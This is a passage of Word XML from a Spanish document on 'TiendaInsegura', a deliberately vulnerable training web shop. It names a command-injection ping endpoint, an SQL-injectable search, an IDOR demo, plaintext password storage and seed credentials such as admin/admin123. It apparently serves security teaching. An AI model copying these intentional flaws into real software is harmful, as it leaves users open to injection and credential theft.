              <w:t xml:space="preserve">Listar usuarios (sin validar rol)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1200"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3900"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">/api/admin/reportes/ping?host=</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4250"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Diagnóstico de red (Command Injection)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Base de datos</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PostgreSQL 16 con cinco tablas: usuarios, categorias, productos, pedidos y pedido_items. El esquema se inicializa con backend/src/main/resources/db/schema.sql y se puebla con datos semilla (usuarios, categorías, productos y dos pedidos de usuarios distintos para la prueba IDOR) en db/data.sql. La columna password de la tabla usuarios almacena las contraseñas en texto plano a propósito (A04).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Punto de entrada de la aplicación</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La clase TiendaInseguraApplication (anotada con @SpringBootApplication) arranca el contenedor de Spring Boot, que a su vez expone el servidor embebido Tomcat en el puerto 8080 configurado en application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Explicación del frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El frontend es una aplicación web estática (sin frameworks de JavaScript) compuesta por páginas HTML independientes, una hoja de estilos y módulos JS organizados por responsabilidad. Se sirve mediante Nginx (contenedor frontend) o, en desarrollo, con Live Server / un servidor HTTP simple.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Páginas (carpeta frontend/)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Archivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="635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Función</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">index.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Catálogo de productos y buscador (consume el endpoint vulnerable a SQLi)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">login.html / registro.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Formularios de autenticación y registro</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">producto.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Detalle de un producto</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">carrito.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Vista del carrito de compras</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">pedido.html / pedidos.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Detalle e historial de pedidos (demo de IDOR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">admin.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Panel de administración, incluye el diagnóstico de red (RCE)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C0392B"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
        </w:rPr>
        <w:t xml:space="preserve">Módulos JavaScript (carpeta frontend/js/)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>config.js — usa /api detrás de Nginx y http://127.0.0.1:8080/api con Live Server.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">api.js — cliente HTTP centralizado (fetch) usado por el resto de módulos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.js — maneja login, registro y almacenamiento del token JWT.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">cart.js — lógica de carrito de compras en el cliente.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">utils.js — funciones auxiliares (formateo, validaciones básicas).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">pages/ — un script por página (home.js, login.js, registro.js, producto.js, carrito.js, pedido.js, pedidos.js, admin.js) que conecta el HTML con la API.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">El frontend no implementa ninguna lógica de seguridad relevante por sí mismo: toda la superficie de ataque real está en el backend. El frontend simplemente construye las peticiones HTTP (incluyendo, en varios casos, el propio payload que el usuario escribe en un campo de búsqueda o formulario) y muestra la respuesta tal cual la entrega la API — por eso es tan directo reproducir cada vulnerabilidad también manualmente desde el navegador, además de con PowerShell/sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1B2A4A" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B2A4A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Datos y credenciales de prueba (seed data)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="276"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">La base de datos se inicializa con los siguientes usuarios de prueba, definidos en backend/src/main/resources/db/data.sql. Todas las contraseñas están almacenadas en texto plano (A04) y también se imprimen (la del admin) en la consola al arrancar el backend (A09).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Usuario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="310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Password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3150"/>
            <w:shd w:fill="1B2A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Rol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">admin123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">ADMIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">jperez</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">password1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3150"/>
            <w:shd w:fill="F4F6F9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">USER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">mgarcia</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3100"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">qwerty123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3150"/>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="110"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="110"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">USER</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6"/>
              <w:left w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:bottom w:val="single" w:color="1B2A4A" w:sz="6"/>
              <w:right w:val="single" w:color="1B2A4A" w:sz="6"/>
            </w:tcBorders>
            <w:shd w:fill="F5F0E6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
